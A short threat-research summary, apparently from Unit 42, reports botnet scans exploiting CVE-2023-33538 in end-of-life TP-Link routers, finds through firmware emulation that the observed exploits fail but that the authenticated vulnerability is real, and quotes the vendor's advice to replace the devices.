We identified active, automated scans and probes attempting to exploit
CVE-2023-33538, a vulnerability in several end-of-life TP-Link Wi-Fi router models:
- TL-WR940N v2 and v4
- TL-WR740N v1 and v2
- TL-WR841N v8 and v10
The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices.
We observed this activity after the Cybersecurity and Infrastructure Security Agency’s (CISA) June 2025 addition of this CVE (Common Vulnerabilities and Exposures) to its
Known Exploited Vulnerabilities (KEV) Catalog.
There has been some discussion of how impactful (or not) these active campaigns might have been. To address this, we conducted a deep-dive investigation by emulating the TP-Link TL-WR940N router. Using firmware emulation and reverse engineering, we analyzed whether the specific exploits observed in our telemetry could successfully use this vulnerability to deliver the payload on that device model.
During our investigation, we uncovered two important facts about the attempted exploitation of this vulnerability:
- Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real
- Successful exploitation requires authentication to the router's web interface
This research demonstrates that while active botnet attacks leverage flawed exploit code, the underlying vulnerability remains a practical infection vector due to the widespread use of default internet of things (IoT) credentials.
TP-Link gave the following recommendation, regarding the devices and vulnerability in question:
We confirm that the affected TP‑Link devices are end‑of‑life, and no vendor patches are available. Our recommendation to customers is to replace these units with supported hardware and ensure that default credentials are not used.
unit42.paloaltonetworks.com
